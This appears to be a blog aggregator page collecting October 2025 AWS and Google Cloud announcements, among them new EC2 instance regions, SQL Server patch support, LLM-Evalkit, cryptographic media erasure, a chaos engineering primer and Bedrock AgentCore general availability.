Cloud

2025 10 14

AWS – Amazon EC2 M8g instances now available in additional regions

Starting today, Amazon Elastic Compute Cloud (Amazon EC2) M8g instances are available in AWS Europe (Paris), Asia Pacific (Osaka), AWS Canada (Central), and AWS Middle East (Bahrain) regions. These instances are powered by AWS Graviton4 processors and deliver up to 30% better performance compared to AWS Graviton3-based instances. Amazon EC2 M8g instances are built for general-purpose workloads, such as application servers, microservices, gaming servers, midsize data stores, and caching fleets. These instances are built on the AWS Nitro System, which oﬄoads CPU virtualization, storage, and networking functions to dedicated hardware and software to enhance the performance and security of your workloads.

AWS Graviton4-based Amazon EC2 instances deliver the best performance and energy efficiency for a broad range of workloads running on Amazon EC2. These instances offer larger instance sizes with up to 3x more vCPUs and memory compared to Graviton3-based Amazon M7g instances. AWS Graviton4 processors are up to 40% faster for databases, 30% faster for web applications, and 45% faster for large Java applications than AWS Graviton3 processors. M8g instances are available in 12 different instance sizes, including two bare metal sizes. They offer up to 50 Gbps enhanced networking bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS).

To learn more, see Amazon EC2 M8g Instances. To explore how to migrate your workloads to Graviton-based instances, see AWS Graviton Fast Start program and Porting Advisor for Graviton. To get started, see the AWS Management Console.

Read More for the details.

2025 10 14

AWS – Amazon Connect now provides configurable thresholds for schedule adherence

Tibor Kiss AWS, Cloud AWS

Amazon Connect now provides configurable thresholds for schedule adherence, giving you more flexibility in how you track agent performance. You can define thresholds for how early or late agents start or end their shifts, as well as for individual activities. For example, agents can start their shift 5 minutes early and end 10 minutes late, or end their breaks 3 minutes late, without negatively impacting their adherence scores. You can further customize these thresholds for individual teams. For example, teams that handle contacts with long handle times can be given more flexibility in when they start their breaks. This launch enables managers to focus on true adherence violations and eliminates the impact of minor schedule deviations on agent performance, thus improving manager productivity and agent satisfaction.

This feature is available in all AWS Regions where Amazon Connect agent scheduling is available. To learn more about Amazon Connect agent scheduling, click here.

Read More for the details.

2025 10 14

AWS – AWS Transfer Family SFTP connectors now support VPC-based connectivity

Tibor Kiss AWS, Cloud AWS

AWS Transfer Family SFTP connectors can now connect to remote SFTP servers through your Amazon Virtual Private Cloud (VPC). This enables you to transfer files between Amazon S3 and any SFTP server, whether privately or publicly hosted, while leveraging the security controls and network configurations already defined in your VPC. By utilizing your NAT Gateways’ bandwidth for file transfers over SFTP, you can achieve improved transfer performance and ensure compatibility with remote firewalls.

AWS Transfer Family provides fully managed file transfers over SFTP, FTP, FTPS, AS2 and web-browser based interfaces. You can now use Transfer Family SFTP connectors to connect with SFTP servers that are only accessible from your VPC, including on-premises systems, external servers shared over private networks, or in-VPC servers. You can present the IP addresses from your VPC’s CIDR range for compatibility with IP controls, and achieve higher bandwidth for large-scale transfers via your NAT gateways when connecting over the internet. All connections are routed through your VPC’s existing networking and security controls, such as AWS Transit Gateway, centralized firewalls and traffic inspection points, helping you meet data security mandates.

SFTP connectors support for VPC-based connectivity is available in select AWS Regions. To get started, visit the AWS Transfer Family console, or use AWS CLI/SDK. To learn more, read the AWS News Blog or visit the Transfer Family User Guide.

Read More for the details.

2025 10 14

AWS – Amazon MSK Connect is now available in ten additional AWS Regions

Tibor Kiss AWS, Cloud AWS

Amazon MSK Connect is now available in ten additional AWS Regions: Asia Pacific (Jakarta), Asia Pacific (Hong Kong), Asia Pacific (Osaka), Asia Pacific (Melbourne), Europe (Milan), Europe (Zurich), Middle East (Bahrain), Middle East (UAE), Africa (Cape Town), and Israel (Tel Aviv).

MSK Connect enables you to run fully managed Kafka Connect clusters with Amazon Managed Streaming for Apache Kafka (Amazon MSK). With a few clicks, MSK Connect allows you to easily deploy, monitor, and scale connectors that move data in and out of Apache Kafka and Amazon MSK clusters from external systems such as databases, file systems, and search indices. MSK Connect eliminates the need to provision and maintain cluster infrastructure. Connectors scale automatically in response to increases in usage and you pay only for the resources you use. With full compatibility with Kafka Connect, it is easy to migrate workloads without code changes. MSK Connect will support both Amazon MSK-managed and self-managed Apache Kafka clusters.

You can get started with MSK Connect from the Amazon MSK console or the Amazon CLI. Visit the AWS Regions page for all the regions where Amazon MSK is available. To get started visit, the MSK Connect product page, pricing page, and the Amazon MSK Developer Guide.

Read More for the details.

2025 10 14

GCP – Agile AI architectures: A fungible data center for the intelligent era

Tibor Kiss Cloud, Google Cloud gcp

It’s not hyperbole to say that AI is transforming all aspects of our lives: human health, software engineering, education, productivity, creativity, entertainment… Consider just a few of the developments from Google this past year: Magic Cue on the Pixel 10 for more personal, proactive, and contextually-relevant assistance; our viral Nano Banana Gemini 2.5 Flash image generation; Code Assist for developer productivity; and AlphaFold, which won its creators the Nobel prize for chemistry. We like to joke that the past year in AI has been an amazing decade!

Underpinning all these advances in AI are equally amazing advances in the computing infrastructure powering AI. If AI researchers are like space explorers discovering new worlds, then systems and infrastructure designers are the ones building the rockets. But keeping up with the demands of AI services will require even more from us. At Google I/O earlier this year, we announced nearly 50X annual growth in the monthly tokens processed by Gemini models, hitting 480 trillion tokens per month. Since then we have seen an additional 2X growth, hitting nearly a quadrillion monthly tokens. Other statistics paint a similar picture: AI accelerator consumption has grown by 15X in the last 24 months; our Hyperdisk ML data has grown 37X since GA; and we’re seeing more than 5 billion AI-powered retail search queries per month.

With great AI comes great computing

This kind of growth brings with it new challenges. When planning for data centers and systems, we are accustomed to long lead times, paralleling the long time to build out hardware. However, AI demand projections are now changing dynamically and dramatically, creating a significant divergence in supply and demand. This mismatch requires new architectures and system design approaches that can respond to extreme volatility and growth.

Rapid technology innovations are essential, but must be carefully managed across the stack. For example, each generation of AI hardware (like TPUs and GPUs) has introduced new features, functionality, but also power, rack, networking and cooling requirements. The rate of introduction of these new generations is also on the rise, making it hard to build a coherent end-to-end system that can accommodate such a vast rate of change. Further, changes in form factors, board densities, networking topologies, power architectures, liquid cooling solutions, etc., all incrementally compound heterogeneity, so that when taken together, there is a combinatorial increase in the complexity of designing, deploying, and maintaining systems and data centers. In addition, we need to design for a spectrum of data center facilities — beyond traditional hyperscalar- or cloud-optimized offerings to “neoclouds” and industry-standard colocation providers – across multiple geographical regions. This adds yet another layer of diversity and dynamism, further constraining data center design for the new AI era.

We can address these two challenges — dealing with dynamic growth and compounding heterogeneity — if we design data centers with fungibility and agility as first-class considerations. Architectures need to be modular, where components can be designed and deployed independently. They should be interoperable across different vendors or generations. Equally important, they should support the ability to late-bind the facility and systems to handle dynamically changing requirements (for example, reuse infrastructure designed for one generation to the next ). Data centers should also be built on agreed-upon standard interfaces, so data center investments can be reused across multiple customer segments. And finally, these principles need to be applied holistically across all components of the data center – power delivery, cooling, server hall design, compute, storage, and networking.

With great computing comes great power (and cooling and systems)

To achieve agility and fungibility in power, we must standardize power delivery and management to build a resilient end-to-end power ecosystem, including common interfaces at the rack power level. Partnering with other members of the Open Compute Project (OCP), we introduced new technologies around +/-400Vdc designs and an approach for transitioning from monolithic to disaggregated solutions using side-car power, a.k.a. Mt. Diablo. Promising new technologies, like low-voltage DC power combined with solid state transformers, will enable these systems to transition to future fully integrated data center solutions.

We are also evaluating solutions for data centers to become suppliers to the grid, not just consumers from it, with corresponding standardization around battery-operated storage and microgrids. We already used such solutions to manage the challenges around the “spikiness” of AI training workloads and are also applying them for additional savings around power efficiency and grid power usage.

Data center cooling, meanwhile, is also being reimagined for the AI era. Earlier this year, we announced Project Deschutes, a state-of-the-art liquid cooling solution that we contributed to the Open Compute community, and have since published the specification and design collateral. The community is responding enthusiastically, with liquid cooling suppliers like Boyd, CoolerMaster, Delta, Envicool, Nidec, nVent, and Vertiv showcasing demos at major events this year, including the OCP Global Summit and SuperComputing 2025. But we have more opportunities to collaborate on: industry-standard cooling interfaces, new components like rear-door-heat exchangers, reliability, etc. One particularly important area is standardizing layouts and fit-out scopes across colos and third-party data centers, so we as an industry can enable more fungibility.

Finally, we need to bring together compute, networking, and storage in the server hall, including physical attributes of the data center design such as rack height, width, and depth (and more recently, weight); aisle widths and layouts; as well as rack and network interfaces. We also need standards for telemetry and mechatronics to build and maintain these future data centers. With our fellow OCP partners, we are standardizing telemetry integration for third-party data centers, including establishing best practices, developing common naming and implementations, and creating standard security protocols.

Beyond physical infrastructure, we are collaborating with our partners to deliver open standards for more scalable and secure systems. A few highlights include:

Resilience: We’ve expanded our multi-year effort on manageability, reliability and serviceability from GPUs to include CPU firmware updates and debuggability.
Security: Caliptra 2.0, the open-source hardware root of trust, now defends against future threats with post-quantum cryptography, while OCP S.A.F.E. makes security audits routine and cost-effective.
Storage: OCP L.O.C.K. builds on Caliptra’s foundation to provide a robust, open-source key management solution for any storage device.
Networking: Congestion Signaling (CSIG) has been standardized and is delivering measured improvements in load balancing. Alongside continued advancements in SONiC, a new effort is underway to standardize Optical Circuit Switching.

Sustainability is embedded in our work. To provide insight into the environmental impact of AI, we developed a new methodology for measuring the energy, emissions, and water impact of emerging AI workloads, demonstrating that the median Gemini Apps text prompt consumes less than five drops of water and has the energy impact of watching TV for under nine seconds. We apply this type of data-driven approach to other collaborations across the OCP community: on an embodied carbon disclosure specification, green concrete, clean backup power, and reduced manufacturing emissions.

A call to action: community-driven innovation and AI-for-AI

Google has a long history of collaboration with open ecosystems that have demonstrated the compounding power of community collaborations, and we have the opportunity to repeat as we design agile and fungible data centers for the AI era. Join us in the new OCP Open Data Center for AI Strategic Initiative on common standards and optimizations for agile and fungible data centers.

As we look ahead to the next waves of growth in AI, and the amazing advances they will unlock, we will need to leverage these AI advances in our own work, to amplify our productivity and innovation. An early example is Deepmind AlphaChip, which uses AI to accelerate and optimize chip design. We are seeing more promising uses of AI for systems: across hardware, firmware, software, and testing; for performance, agility, reliability, and sustainability; and across design, deployment, maintenance, and security. These AI-enhanced optimizations and workflows are what will bring the next order-of-magnitude improvements to the data center. We look forward to the innovations ahead, and to your continued collaboration in driving them forward.

Read More for the details.

2025 10 13

AWS – Amazon RDS now supports the latest CU and GDR updates for Microsoft SQL Server

Tibor Kiss AWS, Cloud AWS

Amazon Relational Database Service (Amazon RDS) for SQL Server now supports the latest General Distribution Release (GDR) updates for Microsoft SQL Server. This release includes support for Microsoft SQL Server 2016 SP3+GDR KB5065226 (RDS version 13.00.6470.1.v1), SQL Server 2017 CU31+GDR KB5065225 (RDS version 14.00.3505.1.v1), SQL Server 2019 CU32+GDR KB5065222 (RDS version 15.00.4445.1.v1) and SQL Server 2022 CU21 KB5065865 (RDS version 16.00.4215.2.v1).

The GDR updates address vulnerabilities described in CVE-2025-47997, CVE-2025-55227, CVE-2024-21907. For additional information on the improvements and fixes included in these updates, see Microsoft documentation for KB5065226, KB5065225, KB5065222 and KB5065865. We recommend that you upgrade your Amazon RDS for SQL Server instances to apply these updates using Amazon RDS Management Console, or by using the AWS SDK or CLI. You can learn more about upgrading your database instance in the Amazon RDS SQL Server User Guide for upgrading your RDS Microsoft SQL Server DB engine.

Read More for the details.

2025 10 13

GCP – Introducing LLM-Evalkit: A practical framework for prompt engineering on Google Cloud

Tibor Kiss Cloud, Google Cloud gcp

If you’ve worked with Large Language Models (LLMs), you’re likely familiar with this scenario: your team’s prompts are scattered across documents, spreadsheets, and different cloud consoles. Iterating is often a manual and inefficient process, making it difficult to track which changes actually improve performance.

To address this, we’re introducing LLM-Evalkit, a light-weight, open-source application designed to bring structure to this process. LLM-Evalkit is a practical lightweight framework built on Vertex AI SDKs using Google Cloud that centralizes and streamlines prompt engineering, enabling teams to track objective metrics and iterate more effectively.

Centralizing a disparate workflow

Currently, managing prompts on Google Cloud can involve juggling several tools. A developer might experiment in one console, save prompts in a separate document, and use another service for evaluation. This fragmentation leads to duplicated effort and makes it hard to establish a standardized evaluation process. Different team members might test prompts in slightly different ways, leading to inconsistent results.

LLM-Evalkit solves this by abstracting these disparate tools into a single, cohesive application. It provides a centralized hub for all prompt-related activities, from creation and testing to versioning and benchmarking. This unification simplifies the workflow, ensuring that all team members are working from the same playbook. With a shared interface, you can easily track the history and performance of different prompts over time, creating a reliable system of record.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x7f82ec352b80>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

From guesswork to measurement

Too often, teams iterate on prompts based on subjective “feel” or a few example outputs. While this can work initially, it doesn’t scale and makes it difficult to justify why one prompt is truly better than another.

LLM-Evalkit encourages a shift in focus from the prompt itself to the problem you’re trying to solve. The methodology is straightforward:

Start with a specific problem: Clearly define the task you want the LLM to perform.
Gather or create a relevant dataset: Build a set of test cases that represent the kinds of inputs the model will see.
Build concrete measurements: Define objective metrics to score the model’s outputs against your dataset.

This approach allows for systematic, data-driven iterations. Instead of guessing whether a new prompt is an improvement, you can measure its performance against a consistent benchmark. Progress can be tracked against objective metrics, making it clear which changes lead to better, more reliable results.

Empowering teams with a no-code approach

Prompt engineering shouldn’t be limited to those who are comfortable with complex tooling and code. When only a few technical team members can effectively build and test prompts, it creates a bottleneck that slows down the development cycle.

LLM-Evalkit addresses this with a no-code, user-friendly interface. The goal is to make prompt engineering accessible to a wider range of team members, including product managers, UX writers, and subject matter experts who have valuable domain knowledge but may not be developers. By democratizing the process, teams can iterate more quickly, test a wider range of ideas, and foster better collaboration between technical and non-technical stakeholders.

Get started

LLM-Evalkit is designed to bring a more systematic and collaborative approach to prompt engineering. By providing a centralized, metric-driven, and no-code framework, it helps teams move from ad-hoc experimentation to a more structured and efficient workflow.

We encourage you to try it out. You can find the open-source repository and documentation on our GitHub. We look forward to seeing how your teams use it to build more effectively with LLMs. For the most up-to-date evaluation features, you can explore them directly in the Google Cloud console. If you prefer a guided approach, a specific console tutorial is available to walk you through the process, providing you with flexible options for all your prompt engineering needs.

Read More for the details.

2025 10 13

GCP – The future of media sanitization at Google

Tibor Kiss Cloud, Google Cloud gcp

At Google, protecting your data is our most important responsibility, and we are committed to keeping your data safe. To further this commitment, we are proud to announce that starting in November 2025, we will start transitioning our approach to media sanitization to fully rely on a robust and layered encryption strategy.

This marks a move away from the “brute force disk erase” process we have used for nearly two decades. While overwriting data has been an effective method, the storage technology landscape has changed dramatically. This process is no longer sustainable due to the size and technological complexity of today’s modern media.

A smarter approach: Cryptographic erasure

To address these challenges, we are embracing a more modern and efficient method of media sanitization: cryptographic erasure.

By default, all user data in Google’s services is protected by multiple layers of encryption. Cryptographic erasure leverages this encryption to sanitize media. Instead of overwriting the entire drive, we securely delete the cryptographic keys that are used to encrypt the data. Once the keys are gone, the data is rendered unreadable and unrecoverable.

This method is not only faster but also aligns with industry best practices. The National Institute of Standards and Technology (NIST) recognizes cryptographic erasure as a valid sanitization technique in its special publication 800-88. We are committed to meeting and exceeding these standards to ensure the security of your data.

Enhancing security through innovation

We implement cryptographic erasure with multiple layers of security, employing a defense in depth strategy. Our trust-but-verify model uses independent verification mechanisms to ensure permanent deletion of media encryption keys.

We also protect secrets involved in this process, like storage device keys, with industry-leading measures. Multiple key rotations enhance the security of customer data through independent layers of trusted encryption.

Sustainability and the circular economy

Our previous method of media erasure had an environmental cost. Any storage device that failed our rigorous verification process was physically destroyed. This resulted in the destruction of a significant number of devices each year.

Cryptographic erasure allows us to move towards a more sustainable, circular economy. By eliminating the need to physically destroy drives, we can reuse more of our hardware. This also allows us to recover valuable rare earth materials, such as neodymium magnets, from end-of-life media. This innovative magnet recovery process is a major accomplishment in sustainable manufacturing, showcasing our commitment to responsible growth.

Our path forward

We have consistently been strong advocates for doing what is truly right for our users, the broader industry, and the world at large. This transition to cryptographic erasure is a direct reflection of that commitment. It allows us to enhance security, align with the highest industry standards, and build a more sustainable future for our infrastructure. We believe this is the right path forward for our users, the industry, and the environment.

For more information about encryption at rest, including encryption key management, see our default encryption at rest security whitepaper.

Read More for the details.

2025 10 13

GCP – Chaos engineering on Google Cloud: Principles, practices, and getting started

Tibor Kiss Cloud, Google Cloud gcp

As engineers, we all dream of perfectly resilient systems — ones that scale perfectly, provide a great user experience, and never ever go down. What if we told you the key to building these kinds of resilient systems isn’t avoiding failures, but deliberately causing them? Welcome to the world of chaos engineering, where you stress test your systems by introducing chaos, i.e., failures, into a system under a controlled environment. In an era where downtime can cost millions and destroy reputations in minutes, the most innovative companies aren’t just waiting for disasters to happen — they’re causing them and learning from the resulting failures, so they can build immunity to chaos before it strikes in production.

Chaos engineering is useful for all kinds of systems, but particularly for cloud-based distributed ones. Modern architectures have evolved from monolithic to microservices-based systems, often comprising hundreds or thousands of services. These complex service dependencies introduce multiple points of failure, and it’s difficult if not impossible to predict all the possible failure modes through traditional testing methods. When these applications are deployed on the cloud, they are deployed across multiple availability zones and regions. This increases the likelihood of failure due to the highly distributed nature of cloud environments and the large number of services that coexist within them.

A common misconception is that cloud environments automatically provide application resiliency, eliminating the need for testing. Although cloud providers do offer various levels of resiliency and SLAs for their cloud products, these alone do not guarantee that your business applications are protected. If applications are not designed to be fault-tolerant or if they assume constant availability of cloud services, they will fail when a particular cloud service they depend on is not available.

In short, chaos engineering can take a team’s worst “what if?” scenarios and transform them into well-rehearsed responses. Chaos engineering isn’t about breaking systems — engineering chaotically, as it were — it’s about building teams that face production incidents with the calm confidence that only comes from having weathered that chaos before, albeit in controlled conditions.

Google Cloud’s Professional Service Organization (PSO) Enterprise Architecture team consults on and provides hands-on expertise on customers’ cloud transformation journeys, including application development, cloud migrations, and enterprise architecture. And when advising on designing resilient architecture for cloud environments, we routinely introduce the principles and practices of chaos engineering and Site Reliability Engineering (SRE) practices.

In this first blog post in a series, we explain the basics of chaos engineering — what it is and its core principles and elements. We then explore how chaos engineering is particularly helpful and important for teams running distributed applications in the cloud. Finally, we’ll talk about how to get started, and point you to further resources.

Understanding chaos engineering

Chaos engineering is a methodology invented by Netflix in 2010 when it created and popularized ‘Chaos Monkey’ to address the need to build more resilient and reliable systems in the face of increasing complexity in their AWS environment. Around the same time, Google introduced Disaster Resilience Testing, or DiRT, which enabled continuous and automated disaster readiness, response, and recovery of Google’s business, systems, and data. Here on Google Cloud’s PSO team, we offer various services to help customers implement DiRT as part of SRE practices. These offerings also include training on how to perform DiRT on applications and systems operating on Google Cloud. The central concept is straightforward: deliberately introduce controlled disruptions into a system to identify vulnerabilities, evaluate its resilience, and enhance its overall reliability.

As a proactive discipline, chaos engineering enables organizations to identify weaknesses in their systems before they lead to significant outages or failures, where a system includes not only the technology components but also the people and processes of an organization. By introducing controlled, real-world disruptions, chaos engineering helps test a system’s robustness, recoverability, and fault tolerance. This approach allows teams to uncover potential vulnerabilities, so that systems are better equipped to handle unexpected events and continue functioning smoothly under stress.

Principles and practices of chaos engineering

Chaos engineering is guided by a set of core principles about why it should be done, while practices define what needs to be done.

Below are the principles of chaos engineering:

Build a hypothesis around steady state: Prior to initiating any disruptive actions, you need to define what “normal” looks like for your system, commonly referred to as the “steady state hypothesis.”
Replicate real-world conditions: Chaos experiments should emulate realistic failure scenarios that the system might encounter in a production environment.
Run experiments in production: Chaos engineering is firmly rooted in the belief that only a production environment with real traffic and dependencies can provide an accurate picture of resiliency. This is what separates chaos engineering from traditional testing.
Automate experiments: Make resiliency testing part of a continuous ongoing process rather than a one-off test.
Determine the blast radius: Experiments should be meticulously designed to minimize adverse impacts on production systems. This requires categorizing applications and services in different tiers based on the impact the experiments can have on customers and other applications and services.

With these principles established, follow these practices when conducting a chaos engineering experiment:

Define steady state: Identifies the specific metrics (e.g., latency, throughput) that you will look at and establish a baseline for them.
Formulate a hypothesis: This is the practice of creating a single testable statement, for example, ‘By deleting this container pod, user login will not be affected’. Hypotheses are generally created by identifying customer user journeys and deriving test scenarios from them.
Use a controlled environment: While one chaos engineering principle states that experiments need to run in production, you should still start small and run your experiment in a non-production environment first, learn and adjust, and then gradually expand the scope to production environment.
Inject failures: This is the practice of causing disruption by injecting failures either directly into the system (e.g., deleting a VM, stopping a database instance) or indirectly by injecting failures in the environment (e.g. deleting a network route, adding a firewall rule).
Automate experimental execution: Automation is crucial for establishing chaos engineering as a repeatable and scalable practice. This includes using automated tools for fault injection (e.g., making it part of a CI/CD pipeline) and automated rollback mechanisms.
Derive actionable insights: The primary objective of using chaos engineering is to gain insights into system vulnerabilities, thereby enhancing resilience. This involves rigorous analysis of experimental results; identifying weaknesses and areas for improvement; and disseminating findings to relevant teams to inform subsequent experimental design and system enhancements.

In other words, chaos engineering isn’t about breaking things for the sake of it, but about building more resilient systems by understanding their limitations and addressing them proactively.

Elements of chaos engineering

Here are the core elements you’ll use in a chaos engineering experiment, derived from these five principles:

Experiments: A chaos experiment constitutes a deliberate, pre-planned procedure wherein faults are introduced into a system to ascertain its response.
Steady-state hypotheses: A steady-state hypothesis defines the baseline operational state, or “normal” behavior, of the system under evaluation.
Actions: An action represents a specific operation executed upon the system being experimented on.
Probes: A probe provides a mechanism for observing defined conditions within the system during experimentation.
Rollbacks: An experiment may incorporate a sequence of actions designed to reverse any modifications implemented during the experiment.

Getting started with chaos engineering

Now that you have a good understanding of chaos engineering and why to use it in your cloud environment, the next step is to try it out for yourself in your own development environment.

There are multiple chaos engineering solutions in the market; some are paid products and some are open-source frameworks. To get started quickly, we recommend that you use Chaos Toolkit as your chaos engineering framework.

Chaos Toolkit is an open-source framework written in Python that provides a modular architecture where you can plug in other libraries (also known as ‘drivers’) to extend your chaos engineering experiments. For example, there are extension libraries for Google Cloud, Kubernetes, and many other technologies. Since Chaos Toolkit is a Python-based developer tool, you can begin by configuring your Python environment. You can find a good example of a Chaos Toolkit experiment and step-by-step explanation here.

Finally, to enable Google Cloud customers and engineers to introduce chaos testing in their applications, we’ve created a series of Google Cloud-specific chaos engineering recipes. Each recipe covers a specific scenario to introduce chaos in a particular Google Cloud service. For example, one recipe covers introducing chaos in an application/service running behind a Google Cloud internal or external application load balancer; another recipe covers simulating a network outage between an application running on Cloud Run and connecting to a Cloud SQL database by leveraging another Chaos Toolkit extension named ToxiProxy.

You can find a complete collection of recipes, including step-by-step instructions, scripts, and sample code, to learn how to introduce chaos engineering in your Google Cloud environment on GitHub. Then, stay tuned for subsequent posts, where we’ll talk about chaos engineering techniques, such as how to introduce faults into your Google Cloud environment.

Read More for the details.

2025 10 13

AWS – Amazon Quick Sight expands font customization for visuals

Tibor Kiss AWS, Cloud AWS

Amazon Quick Sight now supports font customization for data labels and axes. Authors can now customize fonts for data labels and axes in supported charts, in addition to the previously supported font customization for visual titles, subtitles, and legend, as well as tables and pivot tables headers.

Authors can set the font size (in pixels), font family, color, and styling options like bold, italics, and underline across analysis, including dashboards, reports and embedded scenarios. With this update, you can further align your dashboard’s fonts with your organization’s branding guidelines, creating a more cohesive and visually appealing experience. Additionally, the expanded font customization options help improve readability, especially when viewing visualizations on large screens.

This is now available in all supported Amazon Quick Suite regions.

To learn more about this, visit Amazon Quick Suite Visual formatting guide.

Read More for the details.

2025 10 13

AWS – Amazon SageMaker AI Projects now supports custom template S3 provisioning

Tibor Kiss AWS, Cloud AWS

Amazon SageMaker AI Projects now supports provisioning custom machine learning (ML) project templates from Amazon S3. Administrators can now manage ML templates in SageMaker AI studio so data scientists can create standardized ML projects to meet their organizational needs.

Data scientists can use Amazon SageMaker AI Projects to create standardized ML projects that meet organizational requirements and automate ML development workflows. Administrators define standardized ML project templates that include end-to-end development patterns. By provisioning custom templates from Amazon S3, administrators can define standardized project templates and provide access to these templates directly in the SageMaker AI studio for data scientists, ensuring all ML projects follow organizational standards.

SageMaker AI Projects custom template S3 provisioning is available in all AWS Regions where SageMaker AI Projects is available.

To learn more, visit SageMaker AI Projects documentation, and SageMaker AI Studio.

Read More for the details.

2025 10 13

AWS – AWS now supports immediate resource discovery within a Region

Tibor Kiss AWS, Cloud AWS

AWS now provides immediate access to resource search capabilities in all accounts through AWS Resource Explorer. With this launch, you no longer need to activate Resource Explorer to discover your resources in a Region.

To start searching, you need, at minimum, permissions in the AWS Resource Explorer Read Only Access or AWS Read Only Access managed policies. You can discover resources in the AWS Resource Explorer console, Unified Search, and AWS CLI and SDKs. To search the full inventory of supported resources, including historical backfill and automatic updates, complete Resource Explorer setup. This requires additional permissions to create a Service-Linked Role, so that Resource Explorer can automatically complete setup in each Region where you search. You can also enable cross-Region search to discover resources across all Regions in your AWS account with one-click in the Console, or with a single API call using the new CreateResourceExplorerSetup API.

This feature is available at no additional cost in all AWS Regions where Resource Explorer is supported. To start searching for your resources, visit the AWS Resource Explorer console. Read about getting started in the AWS Resource Explorer documentation, or explore the AWS Resource Explorer product page.

Read More for the details.

2025 10 13

AWS – Amazon EC2 High Memory U7i instances now available in Asia Pacific (Mumbai) Region

Tibor Kiss AWS, Cloud AWS

Starting today, Amazon EC2 High Memory U7i instances with 12TB of memory (u7i-12tb.224xlarge) are now available in the Asia Pacific (Mumbai) region. U7i-12tb instances are part of AWS 7th generation and are powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids). U7i-12tb instances offer 12TiB of DDR5 memory enabling customers to scale transaction processing throughput in a fast-growing data environment.

U7i-12tb instances offer 896 vCPUs, support up to 100Gbps Elastic Block Storage (EBS) for faster data loading and backups, deliver up to 100Gbps of network bandwidth, and support ENA Express. U7i instances are ideal for customers using mission-critical in-memory databases like SAP HANA, Oracle, and SQL Server.

To learn more about U7i instances, visit the High Memory instances page.

Read More for the details.

2025 10 13

AWS – Amazon Bedrock AgentCore is now generally available

Tibor Kiss AWS, Cloud AWS

Amazon Bedrock AgentCore is an agentic platform to build, deploy and operate highly capable agents securely at scale using any framework, model, or protocol. AgentCore lets you build agents faster, enable agents to take actions across tools and data, run agents securely with low-latency and extended runtimes, and monitor agents in production – all without any infrastructure management.

With general availability, all AgentCore services now have Virtual Private Cloud (VPC) support, enabling secure, private agent deployment. AgentCore Runtime builds on its preview capabilities of industry-leading eight-hour execution windows and complete session isolation by adding support for the Agent-to-Agent (A2A) protocol, with broader A2A support coming soon across all AgentCore services. AgentCore Gateway now connects to existing Model Context Protocol (MCP) servers in addition to transforming APIs and Lambda functions into agent-compatible tools. Gateway provides a single, secure endpoint for agents to discover and use tools without the need for custom integrations. AgentCore Identity now offers identity-aware authorization, secure vault storage for refresh tokens, and native integration with additional OAuth-enabled services so agents can securely act on behalf of users or by themselves with enhanced access controls. AgentCore Observability now delivers complete visibility into end-to-end agent execution and operational metrics across all AgentCore services through dashboards powered by Amazon CloudWatch, and it is OTEL compatible, offering seamless integration with Amazon CloudWatch and external observability providers like Dynatrace, Datadog, Arize Phoenix, LangSmith, and Langfuse. AgentCore works with any open source framework (CrewAI, LangGraph, LlamaIndex, Google ADK, OpenAI Agents SDK) and any model in or outside Amazon Bedrock, giving you freedom to use your preferred frameworks and models, and innovate with confidence.

Amazon Bedrock AgentCore is available in nine AWS Regions: US East (N. Virginia), US East (Ohio), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), and Europe (Ireland).

Learn more about AgentCore through the blog, deep dive using the AgentCore resources, and get started with the AgentCore Starter Toolkit. AgentCore offers consumption-based pricing with no upfront costs.

Read More for the details.

2025 10 13

AWS – AWS Service Availability Updates

Tibor Kiss AWS, Cloud AWS

After careful consideration, we’re announcing availability changes for a select group of AWS services and features. These changes fall into three lifecycle categories:

Services and Capabilities moving to Maintenance

Services moving to maintenance will no longer be accessible to new customers starting Nov 7, 2025. Current customers can continue using the service or feature while exploring alternative solutions.

Services Entering Sunset

The following services are entering sunset, and we are announcing the date upon which we will end operations and support of the service. Customers using these services should click on the links below to understand the sunset timeline (typically 12 months), and begin planning migration to alternatives as recommended in the updated service web pages and documentation.

Services Reaching End of Support

The following services have reached end of support and are no longer available as of October 7, 2025.

AWS Mainframe Modernization App Testing

For customers affected by these changes, we’ve prepared comprehensive migration guides and our support teams are ready to assist with your transition. Visit AWS Product Lifecycle Page to learn more. or contact AWS Support.

Read More for the details.

2025 10 13

AWS – Generative AI observability now generally available for Amazon CloudWatch

Tibor Kiss AWS, Cloud AWS

Amazon CloudWatch announces the general availability of generative AI observability, helping you monitor all components of AI applications and workloads, including agents deployed and operated with Amazon Bedrock AgentCore. This release expands beyond runtime monitoring to include complete observability across AgentCore’s Built-in Tools, Gateways, Memory, and Identity capabilities. DevOps teams and developers can now get an out-of-the-box view into latency, token usage, errors, and performance across all components of their AI workloads, from model invocations to agent operations. This feature is compatible with popular generative AI orchestration frameworks such as Strands Agents, LangChain, and LangGraph, offering flexibility with your choice of framework.

With this new feature, CloudWatch enalbes developers to analyzes telemetry data across components of a generative AI application. Customers can monitor code execution patterns in Built-in Tools, track API transformation success rates through Gateways, analyze memory storage and retrieval patterns, and ensure secure agent behavior through Identity observability. The connected view helps developers quickly identify issues – from gaps in VectorDB to authentication failures – using end-to-end prompt tracing, curated metrics, and logs. Developers can monitor their entire agent fleet through the “AgentCore” section in the CloudWatch console, which integrates seamlessly with other CloudWatch capabilities including Application Signals, Alarms, Sensitive Data Protection, and Logs Insights.

This feature is now available in US East (N. Virginia), US East (Ohio), US West (Oregon), Europe (Frankfurt), Europe (Ireland), Asia Pacific (Mumbai), Asia Pacific (Tokyo), Asia Pacific (Singapore), and Asia Pacific (Sydney).

To learn more, visit documentation. There is no additional pricing for Gen AI Observability, existing CloudWatch pricing for underlying telemetry data applies.

Read More for the details.

2025 10 13

AWS – Announcing vector search for Amazon ElastiCache

Tibor Kiss AWS, Cloud AWS

Vector search for Amazon ElastiCache is now generally available. Customers can now use ElastiCache to index, search, and update billions of high-dimensional vector embeddings from popular providers like Amazon Bedrock, Amazon SageMaker, Anthropic, and OpenAI with latency as low as microseconds and up to 99% recall.

